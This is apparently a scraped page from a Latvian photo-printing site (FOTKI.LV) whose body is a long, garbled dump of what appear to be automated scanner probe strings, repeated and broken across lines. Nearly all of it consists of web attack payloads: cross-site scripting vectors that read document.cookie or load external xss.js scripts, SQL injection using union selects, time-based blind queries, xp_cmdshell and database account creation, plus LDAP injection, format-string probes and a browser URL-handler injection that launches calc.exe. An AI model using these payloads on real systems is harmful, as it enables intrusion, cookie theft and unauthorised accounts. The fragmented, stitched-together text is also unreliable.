aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
aaaaa aaaaaaaaaa
admin*
admin*
aim: &c:\window
s\sy stem32\cal
c.exe " ini="C:\Do
cume nts and Settings\A
ll Users\Star
t Menu\Progr
ams\ Sta
aim: &c:\window
s\sy stem32\cal
c.exe " ini="C:\Do
cume nts and Settings\A
ll Users\Star
t Menu\Progr
ams\ Sta
aim: &c:\window
s\sy stem32\cal
c.exe " ini="C:\Do
cume nts and Settings\A
ll Users\Star
t Menu\Progr
ams\ Sta
alert('xss
')
alert('xss
')
alert('XSS
');
alert('XSS
');
alert(1)
alert(1)
alert(1)
alert(1)
alert(1)
alert(1)
alert(docu
ment. cookie);
alert(docu
ment. cookie);
anything' or 'x'='x
anything' or 'x'='x
BODYbackgr
ound:url ("javascri
pt:al ert('XSS')
")
BODYbackgr
ound:url ("javascri
pt:al ert('XSS')
")
copy
copy
count(/chi
ld::n ode())
count(/chi
ld::n ode())
create user name identified
by pass123 temporary tablespace
temp default tablespace
users;
create user name identified
by pass123 temporary tablespace
temp default tablespace
users;
delete
delete
exec sp addlogi
n 'name' , 'password'
exec sp addlogi
n 'name' , 'password'
exp/*
exp/*
firefoxurl
:test |"%20-new-
window%20j
avascript:
ale rt(\'Cross
%2520Brows
er%2520Scr
ipting!\')
; "
firefoxurl
:test |"%20-new-
window%20j
avascript:
ale rt(\'Cross
%2520Brows
er%2520Scr
ipting!\')
; "
get
get
head
head
httP://aa"
>aler t(123)
httP://aa"
>aler t(123)
httP://aaa
lert( 123)
httP://aaa
lert( 123)
insert into mysql.user
(user, host, password) values ('name', 'localhost
', password('
pass 123'))
insert into mysql.user
(user, host, password) values ('name', 'localhost
', password('
pass 123'))
insert into users(logi
n, password, level) values( char(0x70)
+ char(0x65)
+ char(0x74)
+ char(0x65)
insert into users(logi
n, password, level) values( char(0x70)
+ char(0x65)
+ char(0x74)
+ char(0x65)
keks
li list-style
-ima ge: url("javas
crip t:alert('X
SS')" );XSS
li list-style
-ima ge: url("javas
crip t:alert('X
SS')" );XSS
lock
lock
mkcol
mkcol
navigatoru
rl:te st" -chrome "javascrip
t:C= Components
.clas ses;I=Comp
onent s.interfac
es;fi le=C[\'@mo
zill
navigatoru
rl:te st" -chrome "javascrip
t:C= Components
.clas ses;I=Comp
onent s.interfac
es;fi le=C[\'@mo
zill
navigatoru
rl:te st" -chrome "javascrip
t:C= Components
.clas ses;I=Comp
onent s.interfac
es;fi le=C[\'@mo
zill
nnosauzumx
or 1=1
or 1=1
perl -e 'print
"&
<SCR
92;0IPT
2;alert& #40;"X
SS" )<
/SCR
92; 0IP
perl -e 'print
"&
<SCR
92;0IPT
2;alert& #40;"X
SS" )<
/SCR
92; 0IP
perl -e 'print "alert("XS
S")" ;' > out
perl -e 'print "alert("XS
S")" ;' > out
propfind
propfind
qwertyqwop
2
search
search
style=colo
r: expression
(ale rt(0));" a="
style=colo
r: expression
(ale rt(0));" a="
style=colo
r: expression
(ale rt(0));" a="
style=colo
r: expression
(ale rt(0));" a="
uni/**/on sel/**/ect
uni/**/on sel/**/ect
User-Agent
: Mozilla/2.
0 (compatibl
e; MSIE 3.02; Update a; Windows NT)
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 5.5; Windows NT 4.0)
User-Agent
: Mozilla/5.
0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/2001
0726 Netscape6/
6.1
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727
User-Agent
: Mozilla/5.
0 (SymbianOS
/9.2 ; U; Series60/3
.1 NokiaE90-1
/210.34.75
Profile/MI
DP-2 .0 Config
User-Agent
: Mozilla/5.
0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB1
7) AppleWebKi
t/52 8.5+ (KH
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.27.1 (KHTML, like Gecko)
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.19 (KHTML, like Gecko) C
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; (R1 1.6))
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.1
0) Gecko/2009
042316 Firefox/3.
User-Agent
: Mozilla/5.
0 (X11; U; Linux i686; en-US; rv:1.7.12)
Gecko/2005
0923 CentOS/1.0
.7-1.4.1.c
en
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5
) Gecko/2008
120122 Firefox/3.
0
User-Agent
: Mozilla/5.
0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.1
4) Gecko/2008
0520 Firefox/2.
0.0.14
User-Agent
: Mozilla/2.
0 (compatibl
e; MSIE 3.02; Update a; Windows NT)
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 5.5; Windows NT 4.0)
User-Agent
: Mozilla/5.
0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/2001
0726 Netscape6/
6.1
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727
User-Agent
: Mozilla/5.
0 (SymbianOS
/9.2 ; U; Series60/3
.1 NokiaE90-1
/210.34.75
Profile/MI
DP-2 .0 Config
User-Agent
: Mozilla/5.
0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB1
7) AppleWebKi
t/52 8.5+ (KH
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.27.1 (KHTML, like Gecko)
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.19 (KHTML, like Gecko) C
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; (R1 1.6))
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.1
0) Gecko/2009
042316 Firefox/3.
User-Agent
: Mozilla/5.
0 (X11; U; Linux i686; en-US; rv:1.7.12)
Gecko/2005
0923 CentOS/1.0
.7-1.4.1.c
en
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5
) Gecko/2008
120122 Firefox/3.
0
User-Agent
: Mozilla/5.
0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.1
4) Gecko/2008
0520 Firefox/2.
0.0.14
User-Agent
: Wget/1.8.2
User-Agent
: Wget/1.8.2
width: expression
((wi ndow.r==do
cumen t.cookie)?
'':al ert(r=docu
ment. cookie))
width: expression
((wi ndow.r==do
cumen t.cookie)?
'':al ert(r=docu
ment. cookie))
width: expression
((wi ndow.r==do
cumen t.cookie)?
'':al ert(r=docu
ment. cookie))
width: expression
((wi ndow.r==do
cumen t.cookie)?
'':al ert(r=docu
ment. cookie))
with(docum
ent. parent )
alert (1)
with(docum
ent. parent )
alert (1)
x' and members.em
ail is NULL; --
x' and members.em
ail is NULL; --
x' and userid is NULL; --
x' and userid is NULL; --
XSS
XSS
XSS
XSS
XSS STYLE=xss:
e/** /xpression
(aler t('XSS'))>
XSS STYLE=xss:
e/** /xpression
(aler t('XSS'))>
XSS/*-*/ST
YLE=x ss:e/**/xp
ressi on(alert('
XSS') )>
XSS/*-*/ST
YLE=x ss:e/**/xp
ressi on(alert('
XSS') )>
y=alert;co
ntent [y](123)
y=alert;co
ntent [y](123)
]]>
]]>
` SRC="http:
//ha .ckers.org
/xss. js">
` SRC="http:
//ha .ckers.org
/xss. js">
`> alert(5)
`> alert(5)
Privātās fotogalerijas
%%20n
%%20s
%.2049d
%08x
%p%p%p%p%p
%p%p% p%p%p
%s%p%x%d
%s%s%s%s
%x%x%x%x
<!
--[i f gte IE 4]>
; <SCRIP
T>al ert(
39;XSS'
; );
</
SC
</
TITLE 2;<SCR
IPT>al
ert(
34;XSS"
; );
</
SCRIPT 62;
<<
SCRIPT>
;al ert(
34;XSS"
; );
/ /<
</
SCRIPT 62;
<BASE HREF=&
#34; javascript
: alert(
'XSS
39; );
/ /"
>
<BODY BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' );
" >
<BR SIZE=&
#34; &{
;aler t('
;XSS' )}
;" ;>
<DIV STYLE=
" ;backgroun
d-ima ge: url(ja
vascript
5 8;alert
0;'XSS
' )
<DIV STYLE=
" ;width:
; expression
(alert
('
XSS' ))
; ">
<HTML xmlns:
xss& #62; <?
import namespace&
#61; "xss
34; implementa
tion ="
ht
<IFRAM
E SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" ><
/IFRAM
E&
<IMG DYNSRC=
; 4;javascri
pt 8;alert
0;'XSS
' );
" >
<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) "
<IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" >
<IMG SRC=
34;h ttp:
47; 47;www.the
sitey ouareon.co
m/ ;somecomma
nd.ph p?some
varia bl
<IMG SRC=
39;v bscript
8;msg box(
34;XSS"
; )'
>
<IMG SRC=
34;l ivescript&
#58;& #91;code
93; 34;>
<IMG SRC=ja
vasc ript:a
lert& #40;&q
uot; ;XSS&q
uot 59;)
62;
<IMG SRC=
34;j av ascript
8;al ert(
39;XSS'
; );
" >
<IMG SRC=
34;j av&
5;x0A;
ascript& #58;alert&
#40;'X
SS' );
" >
<IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; )"
<LINK REL=
34;s tylesheet&
#34; HREF=&
#34; http:&
#47;& #47;testsi
te.co m/xss.
css 34
<META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0;u
rl=j avascript&
#58;a lert(&
<META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0; URL=ht
tp 58;/
47; 59;U
<META HTTP-EQUIV
= ;"Link
" Content
1; 34;<ht
tp:
7 ;/test
site. com/xs
<SCRIP
T a="
; 2;" SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;>&
<SCRIP
T a="
;bla h" ''
SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s&
<SCRIP
T a=`
; 2;` SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;>&
<SCRIP
T a="
; 2;'
2; 4; SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s&
<SCRIP
T SRC=ht
tp 58;/
47;te stsite.com
/ xss.js>
;</
;SCRIPT 62;
<SCRIP
T SRC=ht
tp 58;/
47;te stsite.com
/ xss.js
<SCRIP
T/XS S SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;><
;/SCRI
P
<SCRIP
T>a& #61;/X
SS 7; alert(
a.source
41; </
SCRIPT 62;
<STYLE
TYPE=&
#34; text/j
avasc ript"&
#62;a lert(&
#39;XSS
9; );
</
STY
<STYLE
type=&
#34; text/c
ss 4;>BOD
Y 3;backgrou
nd 8;url(
"javas
cri pt:
<TABLE
BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' )"
> </
TABLE&
<XML ID=
4;xs s">
;<I
2;<B
62;<IM
G SRC=
34;j avas<&
#33;-- --
<XSS STYLE=
" ;xss:e
xpres sion(a
lert(&
#39;XSS
9; ))
" >
<XSS STYLE=
" ;behavior&
#58; url(ht
tp:
7 ;/test
site. com/xs
s.htc );
&
' or 1=1 --
' union (select NULL, (select @@version)
) --
' union (select NULL, NULL, NULL, (select @@version)
) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)
) --
'; exec master..xp
cmd shell 'ping 10.10.1.2'
--
'; if not((selec
t serverprop
erty ('isintegr
ateds ecurityonl
y')) 1) waitfor delay '0:0:2' --
'; if not(select
system use
r) 'sa' waitfor delay '0:0:2' --
'; if not(substr
ing( (select @@version)
,25, 1) 0) waitfor delay '0:0:2' --
'; if not(substr
ing( (select @@version)
,25, 1) 8) waitfor delay '0:0:2' --
*(|(object
class =*))
*)(uid=*))
(|(ui d=*
*|
1 and 1=1
1 and user name(
) = 'dbo'
1 or 1=1
1'1
admin*
create user name identified
by pass123 temporary tablespace
temp default tablespace
users;
exec sp addlogi
n 'name' , 'password'
insert into mysql.user
(user, host, password) values ('name', 'localhost
', password('
pass 123'))
insert into users(logi
n, password, level) values( char(0x70)
+ char(0x65)
+ char(0x74)
+ char(0x65)
nnosauzu
nnosauzu
nnosauzu
nnosauzu
nnosauzu!
nnosauzu%%
20n
nnosauzu%%
20s
nnosauzu%.
2049d
nnosauzu%0
8x
nnosauzu%p
%p%p% p%p%p%p%p%
p%p
nnosauzu%s
%p%x% d
nnosauzu%s
%s%s% s
nnosauzu%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
%s%s% s%s%s%s%s%
s%s%s %s%s%s%s%s
nnosauzu%x
%x%x% x
nnosauzu
60;!--
[i f gte IE 4]>
; <SCRIP
T>al ert(
39;XSS'
; );
<
nnosauzu
60;/TI
TLE 2;<SCR
IPT>al
ert(
34;XSS"
; );
</
SCRIPT 62;
nnosauzu
60;<SC
RIPT>a
l ert(
34;XSS"
; );
/ /<
</
SCRIPT 62;
nnosauzu
60;BASE HREF=&
#34; javascript
: alert(
'XSS
39; );
/ /"
>
nnosauzu
60;BODY BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' );
" >
nnosauzu
60;BR SIZE=&
#34; &{
;aler t('
;XSS' )}
;" ;>
nnosauzu
60;DIV STYLE=
" ;backgroun
d-ima ge: url(ja
vascript
5 8;alert
0;'XSS
'
nnosauzu
60;DIV STYLE=
" ;width:
; expression
(alert
('
XSS' ))
; "
nnosauzu
60;HTML xmlns:
xss& #62; <?
import namespace&
#61; "xss
34; implementa
tion =
nnosauzu
60;IFRAME SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" ><
/
nnosauzu
60;IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; );
" >
nnosauzu
60;IMG DYNSRC=
; 4;javascri
pt 8;alert
0;'XSS
' );
" >
nnosauzu
60;IMG SRC=
34;h ttp:
47; 47;www.the
sitey ouareon.co
m/ ;somecomma
nd.ph p?som
nnosauzu
60;IMG SRC=
39;v bscript
8;msg box(
34;XSS"
; )'
>
nnosauzu
60;IMG SRC=
34;l ivescript&
#58;& #91;code
93; 34;>
nnosauzu
60;IMG SRC=ja
vasc ript:a
lert& #40;&q
uot; ;XSS&q
uot 59;)
62;
nnosauzu
60;IMG SRC=
34;j av ascript
8;al ert(
39;XSS'
; );
" >
nnosauzu
60;IMG SRC=
34;j av&
5;x0A;
ascript& #58;alert&
#40;'X
SS' );
"
nnosauzu
60;IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) &
nnosauzu
60;IMG SRC=
34;j avascript&
#58;a lert(&
#39;XSS
9; )"
nnosauzu
60;LINK REL=
34;s tylesheet&
#34; HREF=&
#34; http:&
#47;& #47;testsi
te.co m/xss
nnosauzu
60;META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0;u
rl=j avascript&
#58;a le
nnosauzu
60;META HTTP-EQUIV
= ;"refr
esh 34; CONTENT
1; 34;0; URL=ht
tp 58;/
4
nnosauzu
60;META HTTP-EQUIV
= ;"Link
" Content
1; 34;<ht
tp:
7 ;/test
site. co
nnosauzu
60;SCRIPT SRC=ht
tp 58;/
47;te stsite.com
/ xss.js>
;</
;SCRIPT 62;
nnosauzu
60;SCRIPT&
#47;XS S SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s" ;><
;
nnosauzu
60;SCRIPT SRC=ht
tp 58;/
47;te stsite.com
/ xss.js
nnosauzu
60;SCRIPT&
#62;a& #61;/X
SS 7; alert(
a.source
41; </
SCRIPT 62;
nnosauzu
60;SCRIPT a="
; 2;" SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s
nnosauzu
60;SCRIPT a="
;bla h" ''
SRC=
34;h ttp:
47; 47;testsit
e.com /
nnosauzu
60;SCRIPT a=`
; 2;` SRC=
34;h ttp:
47; 47;testsit
e.com /xss.j
s
nnosauzu
60;SCRIPT a="
; 2;'
2; 4; SRC=
34;h ttp:
47; 47;testsit
e.com /
nnosauzu
60;STYLE TYPE=&
#34; text/j
avasc ript"&
#62;a lert(&
#39;XSS
9; );
<
nnosauzu
60;STYLE type=&
#34; text/c
ss 4;>BOD
Y 3;backgrou
nd 8;url(
"javas
cr
nnosauzu
60;TABLE BACKGROUND
= ;"java
scrip t:aler
t('
;XSS' )"
> <
nnosauzu
60;XML ID=
4;xs s">
;<I
2;<B
62;<IM
G SRC=
34;j avas<&
#33
nnosauzu
60;XSS STYLE=
" ;xss:e
xpres sion(a
lert(&
#39;XSS
9; ))
" >
nnosauzu
60;XSS STYLE=
" ;behavior&
#58; url(ht
tp:
7 ;/test
site. com/xs
s.htc
nnosauzu' or 1=1 --
nnosauzu' or username is not NULL or username = '
nnosauzu' union (select NULL, (select @@version)
) --
nnosauzu' union (select NULL, NULL, NULL, (select @@version)
) --
nnosauzu' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)
) --
nnosauzu';
exec master..xp
cmd shell 'ping 10.10.1.2'
--
nnosauzu';
if not(substr
ing( (select @@version)
,25, 1) 0) waitfor delay '0:0:2' --
nnosauzu';
if not(substr
ing( (select @@version)
,25, 1) 8) waitfor delay '0:0:2' --
nnosauzu';
if not(select
system use
r) 'sa' waitfor delay '0:0:2' --
nnosauzu';
if not((selec
t serverprop
erty ('isintegr
ateds ecurityonl
y')) 1) waitfor delay '0:0:2' --
nnosauzu(
nnosauzu)
nnosauzu*(
|(obj ectclass=*
))
nnosauzu*)
(uid= *))(|(uid=
*
nnosauzu*|
nnosauzu-1
nnosauzu0x
100
nnosauzu0x
10000
nnosauzu0x
3fffffff
nnosauzu0x
7fffffff
nnosauzu0x
fffffffe
nnosauzu1
nnosauzu1 and user name(
) = 'dbo'
nnosauzu1 and user name(
) = 'dbo'
nnosauzu1 exec sp (or exec xp )
nnosauzu1 or 1=1
nnosauzu1 union all select 1,2,3,4,5,
6,na me from sysobjects
where xtype = 'u' --
nnosauzu1'
and 1=(select count(*) from tablenames
); --
nnosauzu1\
'1
nnosauzuad
min*
nnosauzucr
eate user name identified
by pass123 temporary tablespace
temp default tablespace
users;
nnosauzuex
ec sp addlogi
n 'name' , 'password'
nnosauzuin
sert into mysql.user
(user, host, password) values ('name', 'localhost
', password('
pass 123
nnosauzuin
sert into users(logi
n, password, level) values( char(0x70)
+ char(0x65)
+ char(0x74)
+ cha
nnosauzum
nnosauzum!
nnosauzum!
nnosauzum"
nnosauzum#
nnosauzum$
nnosauzum$
nnosauzum%
nnosauzum&
nnosauzum&
nnosauzum'
nnosauzum(
nnosauzum)
nnosauzum)
nnosauzum*
nnosauzum+
nnosauzum+
nnosauzum,
nnosauzum-
nnosauzum.
nnosauzum/
nnosauzum0
nnosauzum0
nnosauzum0
nnosauzum1
nnosauzum1
nnosauzum2
nnosauzum2
nnosauzum2
nnosauzum3
nnosauzum3
nnosauzum3
nnosauzum4
nnosauzum4
nnosauzum4
nnosauzum5
nnosauzum5
nnosauzum5
nnosauzum6
nnosauzum6
nnosauzum6
nnosauzum7
nnosauzum7
nnosauzum7
nnosauzum8
nnosauzum8
nnosauzum8
nnosauzum8
nnosauzum9
nnosauzum9
nnosauzum:
nnosauzum;
nnosauzum;
nnosauzum=
nnosauzum=
nnosauzum>
nnosauzum?
nnosauzum?
nnosauzum@
nnosauzumA
nnosauzuma
nnosauzumA
nnosauzuma
nnosauzuma
nnosauzumA
nnosauzuma
nnosauzumB
nnosauzumb
nnosauzumB
nnosauzumB
nnosauzumC
nnosauzumc
nnosauzumC
nnosauzumc
nnosauzumc
nnosauzumC
nnosauzumC
nnosauzumc
nnosauzumD
nnosauzumd
nnosauzumD
nnosauzumE
nnosauzume
nnosauzumE
nnosauzume
nnosauzume
nnosauzumE
nnosauzumE
nnosauzumF
nnosauzumf
nnosauzumF
nnosauzumF
nnosauzumG
nnosauzumg
nnosauzumG
nnosauzumg
nnosauzumg
nnosauzumG
nnosauzumH
nnosauzumh
nnosauzumH
nnosauzumH
nnosauzumI
nnosauzumi
nnosauzumI
nnosauzumi
nnosauzumi
nnosauzumI
nnosauzumJ
nnosauzumj
nnosauzumJ
nnosauzumJ
nnosauzumK
nnosauzumk
nnosauzumK
nnosauzumk
nnosauzumk
nnosauzumK
nnosauzumL
nnosauzuml
nnosauzumL
nnosauzumL
nnosauzumM
nnosauzumm
nnosauzumM
nnosauzumm
nnosauzumm
nnosauzumM
nnosauzumN
nnosauzumn
nnosauzumN
nnosauzumN
nnosauzumO
nnosauzumo
nnosauzumO
nnosauzumo
nnosauzumo
nnosauzumO
nnosauzumo
ve
nnosauzumP
nnosauzump
nnosauzumP
nnosauzumP
nnosauzumQ
nnosauzumq
nnosauzumQ
nnosauzumq
nnosauzumq
nnosauzumQ
nnosauzumR
nnosauzumr
nnosauzumR
nnosauzumR
nnosauzumS
nnosauzums
nnosauzumS
nnosauzums
nnosauzums
nnosauzumS
nnosauzumT
nnosauzumt
nnosauzumT
nnosauzumT
nnosauzumU
nnosauzumu
nnosauzumU
nnosauzumu
nnosauzumu
nnosauzumU
nnosauzumV
nnosauzumv
nnosauzumV
nnosauzumV
nnosauzumW
nnosauzumw
nnosauzumW
nnosauzumw
nnosauzumw
nnosauzumW
nnosauzumX
nnosauzumx
nnosauzumX
nnosauzumY
nnosauzumy
nnosauzumY
nnosauzumy
nnosauzumy
nnosauzumY
nnosauzumZ
nnosauzumz
nnosauzumZ
nnosauzum[
nnosauzum\
nnosauzum]
nnosauzum^
nnosauzum^
nnosauzum
nnosauzum`
nnosauzum`
nnosauzum
nnosauzum|
nnosauzum|
nnosauzum
nnosauzum~
nnosauzum~
nnosauzuop
tions
nnosauzupe
rl -e 'print
"&
<SCR
92;0IPT
2;alert& #40;"X
SS" )<
/SCR
nnosauzupo
st
nnosauzupr
oppat ch
nnosauzupu
t
nnosauzutr
ace
nnosauzuun
lock
nnosauzuUs
er-Ag ent: Mozilla/2.
0 (compatibl
e; MSIE 3.02; Update a; Windows NT)
nnosauzuUs
er-Ag ent: Mozilla/4.
0 (compatibl
e; MSIE 5.5; Windows NT 4.0)
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/2001
0726 Netscape6/
6.1
nnosauzuUs
er-Ag ent: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (SymbianOS
/9.2 ; U; Series60/3
.1 NokiaE90-1
/210.34.75
Profile/MI
DP-2 .
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB1
7) AppleWebKi
t/52
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.27.1 (KHTML, lik
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.19 (KHTML, like
nnosauzuUs
er-Ag ent: Wget/1.8.2
nnosauzuUs
er-Ag ent: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; (R1 1.6))
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.1
0) Gecko/2009
042316 Fi
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (X11; U; Linux i686; en-US; rv:1.7.12)
Gecko/2005
0923 CentOS/1.0
.7-1
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5
) Gecko/2008
120122 Fir
nnosauzuUs
er-Ag ent: Mozilla/5.
0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.1
4) Gecko/2008
0520 Firefox/2.
0
nnosauzuXS
S STYLE=xss:
e/** /xpression
(aler t('XSS'))>
nnosauzuXS
S/*-* /STYLE=xss
:e/** /xpression
(aler t('XSS'))>
perl -e 'print
"&
<SCR
92;0IPT
2;alert& #40;"X
SS" )<
/SCR
92; 0IP
sex
User-Agent
: Mozilla/2.
0 (compatibl
e; MSIE 3.02; Update a; Windows NT)
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 5.5; Windows NT 4.0)
User-Agent
: Mozilla/5.
0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/2001
0726 Netscape6/
6.1
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727
User-Agent
: Mozilla/5.
0 (SymbianOS
/9.2 ; U; Series60/3
.1 NokiaE90-1
/210.34.75
Profile/MI
DP-2 .0 Config
User-Agent
: Mozilla/5.
0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB1
7) AppleWebKi
t/52 8.5+ (KH
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.27.1 (KHTML, like Gecko)
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 5.1; en-US) AppleWebKi
t/52 5.19 (KHTML, like Gecko) C
User-Agent
: Mozilla/4.
0 (compatibl
e; MSIE 7.0; Windows NT 5.1; (R1 1.6))
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.1
0) Gecko/2009
042316 Firefox/3.
User-Agent
: Mozilla/5.
0 (X11; U; Linux i686; en-US; rv:1.7.12)
Gecko/2005
0923 CentOS/1.0
.7-1.4.1.c
en
User-Agent
: Mozilla/5.
0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5
) Gecko/2008
120122 Firefox/3.
0
User-Agent
: Mozilla/5.
0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.1
4) Gecko/2008
0520 Firefox/2.
0.0.14
User-Agent
: Wget/1.8.2
XSS STYLE=xss:
e/** /xpression
(aler t('XSS'))>
XSS/*-*/ST
YLE=x ss:e/**/xp
ressi on(alert('
XSS') )>
<< Atpakaļ
Reklāma
© FOTKI.LV Mūsu fotosaloni: Kurzemes prospekts 1a (t/c "Damme"), Kr. Valdemāra iela 25
Jautājumi un atbildes